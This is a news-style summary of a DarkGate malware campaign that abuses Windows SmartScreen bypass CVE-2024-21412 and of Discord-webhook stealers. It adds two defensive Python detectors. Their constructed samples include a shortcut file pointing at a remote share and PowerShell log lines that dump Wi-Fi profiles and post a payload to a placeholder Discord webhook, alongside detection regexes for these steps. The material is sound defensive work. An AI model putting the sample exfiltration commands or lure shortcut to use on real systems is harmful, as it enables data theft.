A cybersecurity alert issued by Trend Micro highlights a concerning DarkGate malware campaign discovered in mid-January 2024. The campaign tricked users with fake software installers and exploited a recently fixed Windows vulnerability that was being abused as a zero-day. PDFs carrying Google DDM redirects spread the malware, sending victims to compromised sites that exploited the Windows SmartScreen bypass CVE-2024-21412 to install DarkMe.
“DarkGate Malware Exploits Patched Microsoft Vulnerability: Zero-Day Attack”
CVE-2024-21412 has a CVSS score of 8.1. It permits unauthenticated attackers to bypass SmartScreen protections via manipulated internet shortcut files. Microsoft fixed the vulnerability in February 2024. Despite this, threat actors such as Water Hydra used it to spread DarkMe malware.
“Trend Micro’s recent findings show increased exploitation of a vulnerability. DarkGate campaign spreads malware through Google Ads redirects.” Phishing emails carry links that, when clicked, redirect through Google’s doubleclick[.]net to compromised servers hosting malicious .URL files that exploit CVE-2024-21412.
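Internet shortcut (.URL) files are plain INI-style text with a `URL=` key under an `[InternetShortcut]` section, which makes them easy to triage before a user ever opens one. The script below is an added defender-side example, not code from the Trend Micro report: it parses that format and flags shortcuts whose `URL=` or `IconFile=` target is a remote share (a UNC path or `file://` with a host) or another shortcut or executable, the shapes that a SmartScreen-bypass lure built on a shortcut file can take. The heuristics and the sample shortcut files are assumptions constructed for the example.

```python
"""Triage heuristic for Windows Internet Shortcut (.URL) files.

Added example (not from the Trend Micro report). Flags shortcut targets
that point at remote file shares or at nested shortcuts/executables.
The two sample files at the bottom are constructed for the example.
"""
from urllib.parse import urlparse, unquote

# Extensions that a benign web bookmark has no reason to point at.
SUSPECT_EXTENSIONS = (".url", ".lnk", ".exe", ".msi", ".dll", ".hta", ".js", ".vbs")


def parse_url_file(text):
    """Return {lowercased key: value} from the [InternetShortcut] section."""
    fields = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")  # tolerate a UTF-8 BOM
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def classify_target(target):
    """Return the reasons a shortcut target looks suspicious (empty list = nothing found)."""
    reasons = []
    t = unquote(target)
    if t.startswith("\\\\"):
        reasons.append("UNC path target (remote SMB/WebDAV share)")
    parsed = urlparse(t)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        reasons.append("file:// target with a remote host")
    path = (parsed.path if parsed.scheme else t).lower()
    if path.endswith(SUSPECT_EXTENSIONS):
        reasons.append("target is a shortcut or executable (." + path.rsplit(".", 1)[1] + ")")
    return reasons


def triage(text):
    """Triage one .URL file's content; checks both the URL= and IconFile= targets."""
    fields = parse_url_file(text)
    target = fields.get("url", "")
    if not target:
        return {"target": None, "reasons": ["no URL= field in [InternetShortcut]"]}
    reasons = classify_target(target)
    icon = fields.get("iconfile", "")
    if icon:
        reasons += ["IconFile: " + r for r in classify_target(icon)]
    return {"target": target, "reasons": reasons}


# Constructed samples: an ordinary bookmark and a shortcut chaining to a remote .url file.
BENIGN_SAMPLE = "[InternetShortcut]\nURL=https://www.example.com/\nIconIndex=0\n"
SUSPECT_SAMPLE = (
    "[InternetShortcut]\n"
    "URL=file://203.0.113.10/share/update.url\n"   # TEST-NET address, constructed
    "IconFile=\\\\203.0.113.10\\share\\icon.ico\n"
    "IconIndex=3\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(name, triage(sample))
```

Run it over a quarantine folder or mail-gateway extraction; any non-empty `reasons` list is a candidate for blocking or analyst review, while an empty list only means the static heuristics found nothing.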
Counterfeit Microsoft software installers, masquerading as Apple iTunes, Notion, and NVIDIA applications, distribute DarkGate malware through a side-loaded DLL file.
“Another patched Windows SmartScreen bypass flaw (CVE-2023-36025, CVSS 8.8) was exploited by threat actors to deliver DarkGate, Phemedrone Stealer, and Mispadu.”
Using Google Ads technology, attackers extend their reach and intensify attacks with tailored ads, widening the threat landscape. Security researchers emphasize the importance of vigilance and caution, urging users to trust only software installers from official sources.
Reports by AhnLab and eSentire reveal fake Adobe Reader, Notion, and Synaptics installers distributed via fake PDFs, leading to data theft.
“New malware, including Planet Stealer, Rage Stealer (xStealer), and Tweaks (Tweaker), is emerging, increasing cyber threats by stealing sensitive data.”
Threat actors use YouTube and Discord to distribute Roblox tweaks, using legitimate platforms to avoid web filter detection. Users inadvertently infect their systems by downloading malicious files disguised as Frames Per Second (FPS) optimization packages.
The malicious PowerShell tool Tweaks steals sensitive data: user information, location, Wi-Fi details, passwords, Roblox IDs, and game currency. It sends the data to attackers through a Discord webhook.
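Because the exfiltration channel is a Discord webhook called from PowerShell, it is visible in PowerShell script block logging. The detector below is an added example, not part of the original article or of any vendor's product: it scores each host on a combination of indicators (a Discord webhook URL, an HTTP upload cmdlet or method, and a Wi-Fi profile dump command) rather than alerting on the webhook alone, since a webhook by itself is also used by legitimate automation. The simplified log format, the weights and threshold, and the sample lines are assumptions constructed for the example.

```python
"""Score PowerShell script-block log lines for Discord-webhook data theft.

Added example (not from the article). Input lines are a simplified
"<timestamp> <host> ScriptBlockText: <script text>" format, constructed
for this example; adapt the parser to your SIEM's field layout.
"""
import re
from collections import defaultdict

# Indicator regexes with weights. Only the combination crosses the threshold.
INDICATORS = {
    "discord_webhook": (
        re.compile(r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+", re.I),
        3,
    ),
    "http_upload": (
        re.compile(r"\b(Invoke-RestMethod|Invoke-WebRequest|UploadString|UploadFile|UploadData)\b", re.I),
        2,
    ),
    "wifi_profile_dump": (re.compile(r"netsh\s+wlan\s+show\s+profile", re.I), 2),
}
ALERT_THRESHOLD = 5


def parse_line(line):
    """Split a log line into (host, script_text); returns None if malformed."""
    parts = line.split(" ", 2)
    if len(parts) < 3 or not parts[2].startswith("ScriptBlockText:"):
        return None
    return parts[1], parts[2][len("ScriptBlockText:"):].strip()


def analyze(lines):
    """Return {host: {"score": int, "indicators": sorted list}} with each indicator counted once per host."""
    hits = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, text = parsed
        hits[host]  # ensure the host appears even with no hits
        for name, (pattern, _weight) in INDICATORS.items():
            if pattern.search(text):
                hits[host].add(name)
    return {
        host: {
            "score": sum(INDICATORS[n][1] for n in names),
            "indicators": sorted(names),
        }
        for host, names in hits.items()
    }


def alerts(lines, threshold=ALERT_THRESHOLD):
    """Hosts whose combined indicator score reaches the threshold."""
    return sorted(h for h, r in analyze(lines).items() if r["score"] >= threshold)


# Constructed sample log lines (the webhook id and token are placeholders).
SAMPLE_LOGS = [
    "2024-03-15T10:02:09Z host1 ScriptBlockText: $wifi = netsh wlan show profiles",
    "2024-03-15T10:02:11Z host1 ScriptBlockText: Invoke-RestMethod -Uri "
    "'https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN' -Method Post -Body $payload",
    "2024-03-15T09:55:00Z host2 ScriptBlockText: Get-ChildItem C:\\Users\\alice\\Documents",
    "2024-03-15T11:00:00Z host3 ScriptBlockText: Invoke-WebRequest -Uri 'https://updates.example.org/manifest.json'",
]

if __name__ == "__main__":
    for host, result in analyze(SAMPLE_LOGS).items():
        print(host, result)
    print("alerts:", alerts(SAMPLE_LOGS))
```

Only host1 reaches the threshold: it combines the webhook, an upload cmdlet, and the Wi-Fi profile dump, while host3's lone `Invoke-WebRequest` to an update server scores too low to page anyone. Indicators are deduplicated per host so a script that posts to the same webhook repeatedly does not inflate its score.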
Malvertising and social engineering are key for spreading stealers and RATs like Agent Tesla, CyberGate RAT, and SapphireStealer.
The evolving threat landscape underscores the critical need for robust cybersecurity measures and user awareness to mitigate the risks posed by sophisticated malware campaigns and social engineering tactics.